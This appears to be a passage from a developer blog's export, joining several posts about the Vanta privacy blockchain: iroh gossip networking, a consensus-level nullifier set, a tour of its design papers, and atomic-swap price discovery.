The first version of `NeighborDown` was `peer_counter.fetch_sub(1, Ordering::Relaxed)`. In a happy path this was fine — every NeighborUp pairs with exactly one NeighborDown, the counter goes up and down, and `/status` shows the right number.

In the actual iroh deployment, NeighborDown can fire without a corresponding NeighborUp ever having been observed. (Reasons: the event stream can drop messages under backpressure; a peer can be "down" from this node's perspective before this node has joined the topic enough to consider them "up.") The bug surfaced as `/status` returning `peer_count: 18446744073709551614`. I had wrapped from 0 → `usize::MAX - 1`. Counting backwards in unsigned arithmetic is a strict no.

The fix is the `fetch_update` + `saturating_sub` pattern in the snippet above. It's slower than a single atomic op (it's a CAS loop) but it's load-bearingly correct: the counter never goes negative, and on the rare double-down-without-up the counter just stays at its current value.

This is the kind of thing you don't notice until production. **TODO: Dax confirm we want to ship `peer_count` over `/status` as a `u32` and saturate there too** — even with the in-memory fix, a 64-bit counter shipped to a frontend could in principle overflow JavaScript's `Number.MAX_SAFE_INTEGER` if something ever went really wrong upstream.

## A toy iroh-shape demo

We can't actually run iroh in a Sandbox — iroh isn't WASM-portable, and it wants real UDP sockets. But we *can* simulate the message-flow shape in plain Node, which is sometimes useful for understanding the topology when you read the Rust code.

<Sandbox
  template="node"
  title="iroh-shape gossip demo"
  files={{
    "/index.js": `// Simulate iroh-gossip's broadcast topology.
// Three peers, one topic, encrypted notes flow between all of them.
// Real iroh would use QUIC + NAT traversal; here we use plain Node IPC.

class Peer {
  constructor(name) {
    this.name = name;
    this.peers = new Set();
    this.seen = new Set();
  }
  connect(other) { this.peers.add(other); other.peers.add(this); }
  broadcast(msg) {
    this.seen.add(msg.id);
    for (const p of this.peers) {
      if (!p.seen.has(msg.id)) {
        console.log(\`  \${this.name} -> \${p.name}: \${msg.kind} \${msg.id}\`);
        p.broadcast(msg); // recursive flood — gossip is O(log N) in practice
      }
    }
  }
}

const a = new Peer("A");
const b = new Peer("B");
const c = new Peer("C");
a.connect(b);
b.connect(c); // A is not directly connected to C

console.log("A broadcasts NewCommitment(0xdeadbeef)");
a.broadcast({ id: "0xdeadbeef", kind: "NewCommitment" });

console.log("\\nC broadcasts EncryptedNote(0xcafebabe)");
c.broadcast({ id: "0xcafebabe", kind: "EncryptedNote" });

console.log("\\nFinal seen sets:");
for (const p of [a, b, c]) {
  console.log(\`  \${p.name}: [\${[...p.seen].join(", ")}]\`);
}
`,
    "/package.json": `{
  "name": "iroh-shape-demo",
  "version": "1.0.0",
  "main": "index.js"
}
`,
  }}
/>

This is the *shape* of gossip flooding. iroh's actual implementation uses HyParView + Plumtree — more sophisticated, with eager-push trees and lazy-pull repair — but the user-facing semantic is the same: broadcast on a topic, every peer eventually sees the message, exactly once.

## Encrypted notes specifically

The largest message type, `EncryptedNote`, is what wallets actually consume. The flow is:

1. Sender's wallet generates a shielded transaction. Part of the witness is an encrypted ciphertext addressed to the recipient's pubkey.
2. Sender's `vanta-node` (via the desktop app) calls `broadcast_encrypted_note(ciphertext)`.
3. iroh-gossip floods every peer in the topic. Every L2 node — including the recipient's — has the ciphertext in memory.
4. The recipient's wallet calls `/notes/scan` against its local `vanta-node`, which trial-decrypts every recently-seen ciphertext against the wallet's secret key.
5. If a trial decryption succeeds, the wallet has detected a payment.

There is no "addressing." There is no "the recipient asks for their notes." Every peer has every note. Each peer's wallet decides which notes are theirs by trying to decrypt. This is the same architectural pattern Zcash sapling uses — a public ciphertext stream with private addressability — and it's why the gossip layer can be totally untrusted: peers see ciphertexts, recipients see plaintext.

<Aside kind="note">
The 64 KB max-message-size is what bounds the encrypted-note size. Right now we're under 1 KB per note. If shielded contracts ship with larger encrypted payloads we'll switch to iroh's blob protocol — content-addressed, fetched on demand — and gossip just the blob hash. That's why `EncryptedNote` is a blob in the message and not a hash; we've got the headroom to inline today.
</Aside>

## What's not in this implementation

A few things to flag, both for honesty and for the next person to read this.

**No gossip-layer backpressure.** If a peer publishes 10,000 encrypted notes in a second, every other peer's tokio task for the receive loop has to deserialize all of them. There's no rate limit, no back-off, no "too many pending events" exception. This is fine on a 1-minute-block chain where the pool's submission rate is bounded, but it would be a real problem on a 250 ms-block chain.

**No peer reputation.** Every peer is equal. A misbehaving peer (sending malformed messages, spamming) is just ignored on a per-message basis. We don't disconnect them, ban them, or de-prefer them in routing. iroh has the primitives (`endpoint.close_peer`) but we don't use them.

**No persistence across restarts.** When `vanta-node` restarts, it forgets every peer it had ever seen and re-bootstraps from the static seed list. This costs ~2 seconds on warm starts. The L1 watcher catches state up from chain history regardless, so this isn't a correctness concern, but a peer cache would shave the startup window.

**No multi-topic.** All Vanta nodes are on one topic. We'll need at least mainnet/testnet split when there's a testnet to speak of; right now the topic is `Vanta/L2/Gossip/v1` and that's literally the only topic that exists. **TODO: Dax confirm we add `Vanta/L2/Gossip/regtest` when the regtest deploy lands.**

## What I changed my mind about

I'd been libp2p-curious for a long time. The crate is mature, it's used by IPFS and Polkadot, the docs are pretty good. I started the Vanta L2 with a libp2p prototype and it worked.

Two things made me switch.

**The configuration burden is per-developer.** Every new contributor who touches `vanta-node` would need to internalise the libp2p configuration matrix (or worse: would copy-paste it from somewhere and not understand what they were copying). iroh's `presets::N0` is a single import. The cognitive load is bounded.

**NAT traversal is solved-default.** libp2p's NAT traversal is a la carte: configure DCUtR, configure STUN, configure relays. iroh's is built in. On a privacy chain whose users include anyone with a residential ISP, NAT traversal is not optional and the failure mode (peer can't be reached) cascades into "wallet stuck waiting for sync." Defaulting it on saved a class of bug I was tired of debugging.

The cost of the switch was about a week of integration work. I'd take that trade every time. iroh has bugs (the saturating-decrement story above is one of mine), but they're bugs at a scope I can hold in my head.

## Further reading

- [`vanta/vanta-node/src/gossip.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-node/src/gossip.rs) — the file this post walks
- [`doc/vanta-architecture.md`](https://github.com/Dax911/vanta/blob/main/doc/vanta-architecture.md) — the rationale for picking iroh
- [iroh.computer](https://iroh.computer) — the upstream project
- [iroh-gossip on docs.rs](https://docs.rs/iroh-gossip) — the crate API
- [The vanta sidecar architecture](/blog/vanta_sidecar_architecture/) — the daemon this gossip layer lives inside
- [Cruiser: A Tauri Hookup App on iroh](/blog/cruiser_iroh_gossip_p2p/) — how the same primitives ship in a different product


---

# L1 nullifier sets: enforcing no-double-spend at consensus

Canonical: https://blog.skill-issue.dev/blog/vanta_l1_nullifier_set/
Description: Most privacy chains track spent notes in a wallet-side index and pray. Vanta puts the nullifier set in chainstate and lets the consensus rules do the praying. Here's why that line moved, and what it costs.
Published: 2026-04-17T05:52:57.000Z
Tags: vanta, zk, nullifier, consensus, bitcoin, utxo


This is a follow-up to [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) and a sibling to [Nullifiers without the witchcraft](/blog/nullifiers_without_witchcraft/). The first post explains the chain. The second explains what nullifiers *are*. This one is about a deliberate, opinionated design decision: **nullifiers in Vanta live at consensus, not at the wallet.**

I want to walk through what that means, what alternatives we considered, what it costs, and why the cost is worth paying.

## The problem statement

In a shielded UTXO model, every spent note has a deterministic, single-use **nullifier** — a hash that proves to a verifier *"some unspent note has been consumed"* without revealing *which* one. The classic Zcash construction is roughly `Poseidon(note_secret_key, commitment)`. The same secret + the same commitment always produces the same nullifier; revealing it twice means two spends of the same note.

The verifier needs to know the global set of nullifiers ever revealed. If the same nullifier appears twice, one of the two spends is invalid. That's how double-spend is detected.

The question every chain has to answer: *where does that nullifier set live?*

## Three answers

### Answer 1 — wallet-side index

The [original Zcash sapling protocol](https://zips.z.cash/protocol/protocol.pdf) materialises the nullifier set client-side. Every wallet trying to spend reads the chain, builds a local nullifier set, and refuses to construct a transaction whose nullifier already appears.

This works. It's also fragile in a way that always made me uncomfortable. A wallet bug — or a malicious wallet — can construct a transaction whose nullifier matches a previous one. The transaction is *valid by chain rules* until the second spend is mined; only then do nodes notice. In practice this means a brief reorg window where a double-spend is technically possible.

It also means **node operators can't run a privacy chain without the wallet code.** That's a sociological problem more than a technical one, but it's real.

### Answer 2 — separate nullifier-tracking smart contract / sidechain

The Tornado-Cash-on-Ethereum approach. The nullifier set lives in a smart contract. The contract enforces uniqueness as a side effect of every withdraw. The chain itself doesn't know what nullifiers are — it just runs the contract.

This works on Ethereum because Ethereum has expressive smart contracts that can hold and mutate large state cheaply (relative to L1 gas). It's a non-starter on a Bitcoin-fork chain because Bitcoin Script doesn't have arbitrary stateful contracts. You could put a precompile in. We didn't want to.

### Answer 3 — chainstate

The nullifier set lives in the same database the UTXO set lives in. Validating a block means *(a)* checking script signatures, *(b)* checking the witness ZK proofs, *(c)* checking that no two spent nullifiers in this block (or this block + history) collide. Nodes that don't enforce nullifier-uniqueness reject blocks the network considers valid. They literally cannot stay in sync.

This is what Vanta does.

## Why we picked answer 3

Three reasons.

### Soundness

A nullifier collision in chainstate is a *consensus violation,* not a wallet bug. There is no version of the network where the double-spend is "valid for a few blocks until someone notices." Either the block is valid or it's not. The confidence story is the same as Bitcoin's UTXO model: a confirmed transaction is final under the same assumptions every other Bitcoin transaction is final under.

This matters for an audience that already understands Bitcoin's finality assumptions. We did not want to introduce a *new* set of finality caveats for the privacy layer.

### Operator simplicity

A node operator running `vantad` doesn't need to also run wallet software, doesn't need to trust an indexer, doesn't need to subscribe to a third-party "nullifier feed." The chain validates itself. This is the same reason most exchanges run their own Bitcoin nodes instead of trusting Blockchain.info: chainstate is the source of truth.

### Wallet flexibility

If the chain owns nullifier-uniqueness, wallets become *commodity software.* You can have ten different wallets, three different proof systems, an iOS-native client, a CLI, a hardware-wallet integration — and they all rely on the same chainstate validation. The wallet's job collapses to "construct a valid spending transaction." The chain is the arbiter.

## What it costs

Nothing is free. Three real costs:

### Storage

Every nullifier ever revealed has to live in chainstate forever. With Poseidon-2 over BN254 the digest is 32 bytes. Vanta is a 1-minute-block chain with 100k VANTA per block; assume a long-term steady state of, say, 5 nullifiers per block (transparent transactions don't burn nullifiers; only shielded spends do). At ~525,600 blocks per year, that's `5 × 525600 × 32 = ~84 MB` of nullifier state per year. After ten years: ~840 MB.

Compare to Bitcoin's UTXO set, which is currently ~12 GB. We're well below it. Storage is not the limiting factor.

### Sync time

A new node has to download and verify the nullifier history. The verification cost is just a hash check per nullifier (no proof re-verification needed if the block was already validated by the network — the witness root in the coinbase commits to the SMT). At a few microseconds per hash, ten years of history validates in ~half an hour on a modern CPU. Acceptable.

### Sparse-Merkle-tree maintenance

This is the real cost. We commit to the *root* of the nullifier set in every coinbase, so that light clients and SPV-style verifiers don't need the full chainstate to verify a proof. Maintaining an SMT over a growing set of 32-byte hashes is non-trivial. We use the [`smirk` Rust crate](https://crates.io/crates/smirk) (an SMT library written for exactly this kind of consensus-state use case) and the marginal cost per insert is `O(log n)` hashes — a few hundred microseconds in practice.

The implementation lives in [`vanta/` (the Rust subtree)](https://github.com/Dax911/vanta/tree/main/vanta) and the binding into the C++ core happens in `src/validation.cpp` via FFI. **TODO: Dax confirm exact SMT crate name** — `smirk` is what we use today; if we switched to a custom implementation note that here.

## The witness-v2 dance

Here's the part that took me longest to get comfortable with. Bitcoin's witness data (segwit) is verified after the script. We needed the ZK proof to be verified after the script too — the script confirms the spender knows the right commitment, the proof confirms the spend is valid under the rules of the shielded pool.

Vanta extends segwit to a "witness v2" format that includes:

1. The classic script witness (signatures, etc.).
2. A new `proof_root` field — a 32-byte commitment to the proof's public inputs.
3. A new `nullifier` field — the 32-byte nullifier the spend is consuming.

The C++ validator does three checks in order:

1. The script verifies (standard segwit path).
2. The `nullifier` is not already in the chainstate nullifier set.
3. The `proof_root` matches the in-block coinbase's SMT root for this transaction's logical position.

The actual ZK proof verification happens **out of process** in the Rust sidecar. The C++ node fires off the proof to a local Unix socket and waits for `ok` or `not ok`. This sounds slow but in practice the prover-side work is what's expensive (4-8 seconds); the verifier-side check is ~30 milliseconds and well-amortised across the block.

If the sidecar is unavailable, the node refuses to validate witness-v2 transactions and stays in IBD-style "I'm not caught up" mode. Better than silently accepting unverified shielded spends.

## What I changed my mind about

I started this design wanting to put proof verification *inside* the C++ validator via a precompile-style C++ binding. That would have meant linking the entire `risc0-zkvm` Rust crate into Bitcoin Core's C++ build, which is — to put it mildly — not a small ask of a Bitcoin Core review process.

The out-of-process sidecar pattern was a concession to "we will eventually want to upstream as much of this as possible." A node that talks to a sidecar over a Unix socket is a node that can be ported to the eventual full-Rust rewrite without changing its consensus contract. The sidecar is the ABI; the language behind it can move.

I'm still not 100% sold on this trade. The audit surface is a lot bigger when there are two processes. **TODO: Dax confirm whether we end up upstreaming the proof verifier into the core process for v2.**

## Further reading

- [`Dax911/vanta`](https://github.com/Dax911/vanta) — the chain
- [`vanta/` Rust subtree](https://github.com/Dax911/vanta/tree/main/vanta) — the ZK sidecar
- [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) — the parent post
- [Nullifiers without the witchcraft](/blog/nullifiers_without_witchcraft/) — the SDK-side primitive
- [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/) — what the commitments commit to
- Hopwood, Bowe, Hornby, Wilcox — *Zcash Protocol Specification* (2022 edition)
- Buterin et al. — [*Sparse Merkle Trees*](https://eprint.iacr.org/2016/683)


---

# What's in vanta/papers — reading 17 design docs in 2026

Canonical: https://blog.skill-issue.dev/blog/vanta_papers_design_doc_tour/
Description: Vanta ships its whitepaper as 17 markdown files in the repo, not a PDF on a marketing page. This is the tour: what each doc covers, which one has the wording bug, and why the docs live next to the code.
Published: 2026-04-14T19:50:56.000Z
Tags: vanta, documentation, whitepaper, design


A privacy chain in 2026 cannot ship as a one-page marketing site with a PDF link. The serious audience — auditors, exchanges, regulators, other engineers — needs to read the design without filling out a form. So Vanta's whitepaper isn't a PDF on a website. It's a directory: [`papers/`](https://github.com/Dax911/vanta/tree/main/papers) in the main repo, 17 markdown files, MIT-licensed, version-controlled, diffable.

This post is a tour. One paragraph per doc, plus the planning notes that aren't in `papers/` but are in [`planning/`](https://github.com/Dax911/vanta/tree/main/planning). At the end I call out the wording bug the audit flagged but I haven't fixed yet.

## Why design docs in the repo

Three reasons.

**Diffability.** A change to the chain rules is a commit. The doc that explains the rule change is also a commit. Over time the doc diff and the code diff are in the same git history, so you can check whether the prose ever lagged the code.

**No marketing intermediary.** A PDF on a website goes through whoever owns the website. A markdown file in the repo is *the* artefact; nobody can mis-summarize it without me noticing. This matters more than I expected when the audience for the docs is "people who will run nodes" rather than "people who will buy the token."

**They're the input to the LLMs that read the codebase.** Increasingly, technical evaluation in 2026 is mediated by AI assistants reading the repo. Markdown in the repo is what those tools index. PDF on a website is not. **TODO: Dax confirm this is still our framing once the docs/ ship has matured.**

## The 17 papers

`00-master.md` — index of everything else. If you only read one, this is the one to *not* read; jump to `01`.

`01-executive-summary.md` — the headline pitch in long form. The opening line is the design: *"Vanta Protocol is the first sovereign Layer 1 blockchain where financial privacy is enforced by consensus on every non-coinbase transaction."* The interesting bits: the explicit refusal of Zcash-style optional shielding, the rule name `bad-vanta-v2-output-nonzero-value` that fires on any v2 output with non-zero `nValue`, the "fast privacy decay" coinbase pattern (one confirmation transparent, private after).

`02-technical-whitepaper.md` — the deep dive. Witness v2 layout, the `VantaJournal` struct, the `value_balance` semantics (>0 burns hidden value to L1, <0 mints it from L1, =0 is a pure shielded transfer). The arithmetic of the consensus rule. This is the paper an auditor reads.

`03-comparative-technical-analysis.md` — Vanta vs Zcash, vs Monero, vs Penumbra, vs CoinJoin-on-Bitcoin. Honest about where each peer is ahead and where each is behind. Calls out that Penumbra is on the wrong chain base (Cosmos SDK + Tendermint BFT) for our specific bet on PoW.

`04-market-analysis.md` — TAM and competitive positioning. Not technical, but useful for understanding the framing. **TODO: Dax confirm the market sizing before I quote it elsewhere.**

`05-layer-taxonomy.md` — the taxonomy of L1 / L2 / sidechain / app-layer privacy and where Vanta sits. Most useful for readers who have already absorbed Penumbra, Zcash, Tornado Cash, and want to triangulate.

`06-pitch-deck.md` — the slides version. Repeats the executive summary at lower resolution.

`07-business-plan.md` — operations, deployment, infra. Mostly internal but in the open repo because there's nothing actually private in a fair-launch chain's business plan.

`08-tokenomics.md` — the supply schedule, halvings, fair launch. The numbers are the ones in the [original L1 post](/blog/vanta_zk_privacy_l1/): 100k VANTA per block, 42B total supply, 210k-block halving (~146 days). Zero premine, zero founders allocation. **TODO: Dax confirm we're not making any forward statements about $VANTA price or fundraising; I have *not* read these tokenomics with that lens and I won't quote any forward-looking number.**

`09-performance-analysis.md` — block-time, propagation, proof-time benchmarks. Prover takes 30–60s on CPU, verifier ~30ms. Block validation overhead is the verifier cost amortised across block transactions. Acceptable for 1-minute blocks.

`10-novelty-analysis.md` — what's new vs prior art. The honest version: very little is new at the *primitive* level (Pedersen commitments, nullifiers, SMTs, all known); the synthesis (mandatory privacy + Bitcoin Core fork + SP1 backend + AuxPoW path) is the contribution.

`11-paradigm-research.md` — the broader research positioning. Reads as a literature review. Useful if you want to know where the design borrows ideas from (Zcash, Penumbra, Aleo) and where it deliberately diverges.

`12-academic-paper.md` — the conference-paper version. Same content as `02`, formatted to academic conventions. The version we'd submit to a privacy-coin venue if we were doing that.

`13-security-model.md` — what the chain protects against, what it doesn't. The "what it doesn't" list is the important part: targeted timing attacks on a single transaction, side-channel leakage through wallet behaviour, an adversary with control of the proof-network if the user uses one. Read this before you build on top.

`14-public-roadmap.md` — what's shipped, what's coming. Phase 1/2 complete, Phase 3 in progress (L2 privacy layer with iroh gossip), Phase 4 future (full Rust node rewrite). The dates are deliberate ranges, not commitments.

`15-regulatory-framework.md` — how the chain reads to a regulator. **TODO: Dax confirm before I quote any specific position; I am not a lawyer and the regulatory narrative belongs to the legal review, not to me writing a blog post.**

`16-use-cases.md` — what people will actually do with the chain. Treasury operations, individual savings, atomic-swap liquidity. Honest about which use cases need *more than* mandatory privacy (e.g. payroll, where the recipient set has to be opaque too — that's a wallet UX problem, not a chain problem).

`17-zkvm-engineering.md` — the deep dive on SP1, Plonky3, why we picked them, the abstraction layer that makes zkVMs swappable. I cited this paper extensively in [Why we shipped SP1 instead of RISC Zero](/blog/vanta_sp1_zkvm_circuits/). It's the most useful paper for an engineer evaluating Vanta against another zkVM-based chain.

## The planning notes

[`planning/`](https://github.com/Dax911/vanta/tree/main/planning) is *not* in `papers/`. It's the loose work-in-progress notes I'm not ready to call canonical. Today there's one file: [`price-discovery-for-private-swaps.md`](https://github.com/Dax911/vanta/blob/main/planning/price-discovery-for-private-swaps.md).

That doc is worth a separate post, which I wrote: [Private atomic swaps and the price-discovery problem](/blog/vanta_private_atomic_swaps/). The short version: if either side of an atomic swap is shielded, the rate `btc_amount / vanta_amount` is hidden from observers, which means no public price tape, which means no spot market formation. The doc walks through six options for how price could emerge without compromising the privacy property — voluntary post-trade rate publication, ZK-attested rate proofs, off-chain encrypted order books — and lands on a hybrid recommendation.

I'm holding it in `planning/` rather than `papers/` because it's a *design exploration*, not a commitment. The status line at the top says exactly that: "Status: Design exploration, not a commitment. Written 2026-04-17."

## The wording bug I haven't fixed

The repo's [`CLAUDE.md`](https://github.com/Dax911/vanta/blob/main/CLAUDE.md) flags an inconsistency I'm aware of:

> Phase 2 papers wording is "code complete, activation pending" but code shows `ALWAYS_ACTIVE` from genesis — wording bug in `papers/01-executive-summary.md` to fix.

The executive summary in `01-executive-summary.md` describes some of the privacy rules as "code complete, activation pending." The actual chain has those rules `ALWAYS_ACTIVE` from genesis — they're enforced from block 1, not gated behind a future activation. The doc lags the code.

This is the kind of thing that *only* happens when you're rewriting both fast. The fix is a five-minute paragraph edit; I'm calling it out here because the right way to handle a doc-vs-code drift is to say "yep, doc lags, here's the fix" rather than to silently update and hope nobody noticed. **TODO: Dax confirm timing on shipping that fix.**

## Why the docs are the README's older sibling

A reader who only reads the [README.md](https://github.com/Dax911/vanta/blob/main/README.md) gets the chain parameters and a roadmap. A reader who reads `papers/` gets the *case* for the chain — why these parameters, why this proof system, why mandatory privacy, why fair launch.

The README is for someone who's deciding whether to spend an hour. The papers are for someone who's deciding whether to run a node, port a wallet, list the asset, write a regulatory memo, or audit the cryptography. Different audiences, different artefacts.

Both live in the repo. Both are diffable. Both are MIT-licensed. That's the documentation discipline I'm trying to lock in: nothing about how the chain works lives behind a marketing page or a sales rep.

## Further reading

- [`papers/`](https://github.com/Dax911/vanta/tree/main/papers) — the 17 markdown files
- [`papers/00-master.md`](https://github.com/Dax911/vanta/blob/main/papers/00-master.md) — the index
- [`papers/01-executive-summary.md`](https://github.com/Dax911/vanta/blob/main/papers/01-executive-summary.md) — the headline pitch
- [`papers/17-zkvm-engineering.md`](https://github.com/Dax911/vanta/blob/main/papers/17-zkvm-engineering.md) — the SP1/Plonky3 deep dive
- [`planning/price-discovery-for-private-swaps.md`](https://github.com/Dax911/vanta/blob/main/planning/price-discovery-for-private-swaps.md) — the swap-price design exploration
- [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) — the practitioner-flavored pitch
- [Why we shipped SP1 instead of RISC Zero](/blog/vanta_sp1_zkvm_circuits/) — the post that quotes paper 17 most


---

# Private atomic swaps and the price-discovery problem

Canonical: https://blog.skill-issue.dev/blog/vanta_private_atomic_swaps/
Description: BTC ↔ VANTA atomic swaps via HTLC are the easy part. If the VANTA leg is shielded, no observer can compute the rate, and no rate means no public price. Walking through six designs and the hybrid recommendation in vanta/planning.
Published: 2026-04-17T05:52:57.000Z
Tags: vanta, atomic-swaps, htlc, price-discovery, planning


The 2026-04-17 commit message — `planning: price-discovery design for private atomic swaps` — is one of the more interesting things in the Vanta repo, because it isn't code. It's a design exploration in [`planning/price-discovery-for-private-swaps.md`](https://github.com/Dax911/vanta/blob/main/planning/price-discovery-for-private-swaps.md), and it's the kind of doc I wish more chains shipped: a problem statement, six options, an honest comparison, a recommendation, and an explicit *"this is not a commitment"* status flag.

This post walks through the design. The HTLC machinery on the implementation side lives in [`vanta/vanta-swap`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-swap); the policy question is in `planning/`.

## What atomic swaps are, briefly

A hash-time-locked contract (HTLC) lets two parties on different chains agree to a swap without trusting each other or a third party. Alice has BTC, Bob has VANTA. They agree to swap. Alice picks a random secret `s`, computes `h = sha256(s)`. They both lock their funds in HTLCs that pay out to *whoever knows `s`* (and refund to the original sender after a timeout, if `s` never gets revealed).

The script for the HTLC is short — quoting [`vanta/vanta-swap/src/htlc.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/htlc.rs):

```
OP_IF
  OP_SHA256 <hash> OP_EQUALVERIFY <receiver_pubkey> OP_CHECKSIG
OP_ELSE
  <locktime> OP_CHECKLOCKTIMEVERIFY OP_DROP <sender_pubkey> OP_CHECKSIG
OP_ENDIF
```

The `IF` branch is "claim with the preimage." The `ELSE` branch is "refund after the timelock." Both are P2WSH-wrapped. The receiver claims by revealing `s` to spend the HTLC; once `s` is on-chain, the other side claims their HTLC using the same `s`. If either side bails, both refund after the timeout.

Same `hash` on both chains. Same `OP_SHA256`. Both Bitcoin and Vanta speak this script unchanged. That's why the swap implementation in [`vanta/vanta-swap/src/swap.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-swap/src/swap.rs) works against both chains' RPCs with a single `ChainConfig` abstraction.

## The price-discovery problem

The swap implementation today is *fully transparent on both sides*. From the planning doc:

> Worth being precise: **the current swap implementation is fully transparent on both sides.**
>
> - `swap.rs` funds the VANTA leg via L1 RPC (`createrawtransaction` →  `fundrawtransaction` → `signrawtransactionwithwallet` → `sendrawtransaction`). That's the transparent L1, not the shielded L2.
> - So `vanta_amount` is plainly visible in the P2WSH output on L1.
> - `btc_amount` is visible on Bitcoin.
> - Price is therefore **already discoverable today** by anyone scanning matched hashes across the two chains.

So the problem is *forward-looking*. Once the VANTA leg moves to a shielded note (commitment + encrypted amount, no visible value on L1), an external observer can:

- find the BTC-side HTLC with amount `X` and embedded hash `h`
- see *that* a note with commitment tied to `h` exists on VANTA L2, but not its amount `Y`
- without `Y`, no `X/Y` rate

No rate means no tape. No tape means no public order book. No public order book means no efficient price formation. *That* is the problem.

I want to push back on a knee-jerk response that "privacy chains shouldn't have public prices." Of course they should — every market needs a price. The question is *how price emerges without compromising the privacy property*. That's not the same as "should there be a price at all," which is a question I think privacy maximalists sometimes confuse.

## Six options

The doc walks through six designs. I'll abbreviate.

### 1. Do nothing — OTC negotiation only

Peers find each other on Nostr / Telegram / a forum, agree privately, swap. Zero engineering. Zero price discovery. Hard to bootstrap a market. New users can't tell what a fair rate is. LPs won't come.

Pros: trivial, full privacy. Cons: the market doesn't form.

### 2. Voluntary post-trade rate publication

After a swap, either party signs a `{rate, timestamp}` statement and posts it to a relay (Nostr, an HTTP aggregator, whatever). An aggregator computes a median or time-bucketed mean. **Crucially: publish the rate, not the size.** Rate is a scalar; it leaks nothing about how much the signer actually traded.

Pros: simple, opt-in, amounts stay shielded. Cons: self-reported, trivially fakeable. Anti-spam needs a cost function — proof of recent swap, a small VANTA burn, a reputation-weighted signer set.

### 3. ZK-attested rate proofs

Use SP1 (already in the consensus stack) to prove:

> "I participated in a swap whose hash is `H` (publicly known), and the rate was in `[r − ε, r + ε]`, without revealing either amount."

The circuit takes `X`, `Y`, `r` as private witness, publishes `H` and `r` as public output. Anyone can verify the SP1 proof and see a rate without seeing amounts.

Pros: cryptographically binding, not self-reported. Cons: non-trivial circuit work; SP1 proof costs (the doc notes the 5070 box is below the 24 GB GPU minimum, so we'd need CPU proving or a remote prover); UX friction.

### 4. Off-chain encrypted order book with HTLC settlement

Bisq-style. Orders live in a P2P relay (Tor hidden service, Nostr, Waku). Orders are plaintext (amount, rate, counterparty pubkey) at *posting* time. Match happens, counterparties swap via HTLC, order disappears. Price discovery is from the *order book*, not from chain history.

Pros: decouples price discovery (pre-trade order book) from settlement privacy (post-trade on-chain). The doc calls this "arguably the right architecture."

Cons: requires a relay layer; orders-in-the-open weakens pre-trade privacy of unfilled orders.

### 5. Trusted LP / market maker

Professional MMs run their own nodes, quote two-sided publicly, users trade against them via atomic swap. LPs willingly reveal quotes because that's their business.

Pros: realistic bootstrapping path, CEXes already work this way. Cons: centralises price discovery; LPs need KYC/operational reality → potentially a regulatory attack surface.

### 6. Hybrid: opt-in transparent-swap mode

Users opt into a "transparent swap" that pins the VANTA leg to L1 (visible). Those swaps contribute to a public price tape. Private traders settle on L2 and free-ride on the tape.

Pros: zero new crypto; user-level privacy/contribution choice. Cons: tragedy-of-the-commons. Everyone wants privacy, nobody wants to be the transparent swapper. Requires incentive design (fee rebates for transparent swappers?).

## The recommendation

The doc lands on a hybrid of #4 and #2:

> For a near-term path: **combine #4 (off-chain order book) + #2 (voluntary rate publication)**. Rationale:
>
> - #4 gives us an actual market — users see bids/asks before committing.
> - #2 gives us a historical tape — aggregators compile published rates into OHLC candles.
> - Both respect the privacy invariant: amounts stay shielded.
> - Both are boring engineering, not new cryptography. We can ship them.
> - #3 (ZK rate proofs) is a "do it later if spam becomes a real problem" lever.

I agree with this and want to underscore the framing: *boring engineering, not new cryptography*. New cryptography is expensive in the medium term — it has to be audited, the implementation has to land, the wallets have to integrate, the tooling has to mature. An off-chain order book + voluntary rate posts ship in a quarter using existing primitives. The ZK rate-proof option is a clean lever to pull *later*, if the simpler scheme proves insufficient against spam.

Worth a moment on #3 specifically. ZK rate proofs are tempting because they're cool. They're also a chunk of circuit work, and the wallet UX gets one more "generate proof" wait. Building it before we know whether voluntary publication produces enough useful data is over-engineering. The principle: **build the simplest thing that could work, instrument it, then add cryptography when the simpler thing demonstrably fails.**

## Open questions the doc flags

The planning note ends with five questions I haven't answered yet:

1. **Anti-spam for voluntary publication.** Cost function: proof of recent shielded spend? Small VANTA burn? Reputation-weighted signer? My current bias is "small VANTA burn weighted by chain age" — cheap to publish if you've held VANTA for a while, expensive if you haven't, no operational dependency on a reputation graph.
2. **Relay topology.** Nostr (easy, public), Waku, or a Tor hidden-service relay? Probably Nostr to start. **TODO: Dax confirm we want Nostr-first vs a custom relay.**
3. **Quote units.** sats/VANTA or VANTA/BTC? Pick one canonical representation up front and stick it in the whitepaper suite. I lean sats/VANTA because it makes for round numbers at current valuation.
4. **Handling the current transparent swap.** Migration path or permanent second mode? Affects whether the price-discovery design has to handle two worlds. **TODO: Dax confirm.**
5. **Cross-asset routing.** VANTA ↔ X ↔ BTC via multi-hop. Out of scope here, but on the longer-term roadmap.

These are the kind of open questions that *should* be public. A privacy chain whose policy decisions are made behind closed doors is, sociologically, a chain you can't trust. Putting the design exploration in the open repo means the discussion happens in pull requests, not in a slack I run.

## What's *not* in this design

A couple of things I want to flag explicitly because they often come up.

**Oracles.** Vanta does not currently feed external prices into on-chain logic. There's no smart-contract platform, so there's no place to feed them *to*. Oracles are an L2 problem; they'll show up if and when programmable shielded contracts ship.

**Loans / derivatives.** Out of scope. Spot atomic swaps are the spot market. DeFi primitives beyond spot are a much larger conversation.

**A unified DEX.** I am skeptical of "one app to rule them all" DEX designs for a privacy chain. Composability is harder when amounts are shielded; the simplest path is probably *multiple* small-surface protocols (atomic swaps for cross-chain, order book for in-chain, AMM only if liquidity demands it).

## What changed my mind about the swap problem

Two things.

First, when I started thinking about this, I assumed ZK rate proofs (option 3) were the obvious answer because they're the most cryptographically clean. They're also the most cryptographically *expensive*. Once I actually thought about the user flow — generate a swap, generate a proof, *then* publish — I realised the friction would crater participation. The voluntary scheme is worse on cryptographic strength but enormously better on participation, and a market with weaker price proofs that more people use is a better market than a strong-proof market that nobody uses.

Second, I underestimated how much of the answer is *just an order book*. Bisq's design has been working for years on exactly this problem (privacy-respecting BTC ↔ fiat). An off-chain encrypted order book with on-chain HTLC settlement is the architecture that *already works* in the wild for a closely-related problem. Reusing it for VANTA ↔ BTC is the smallest delta.

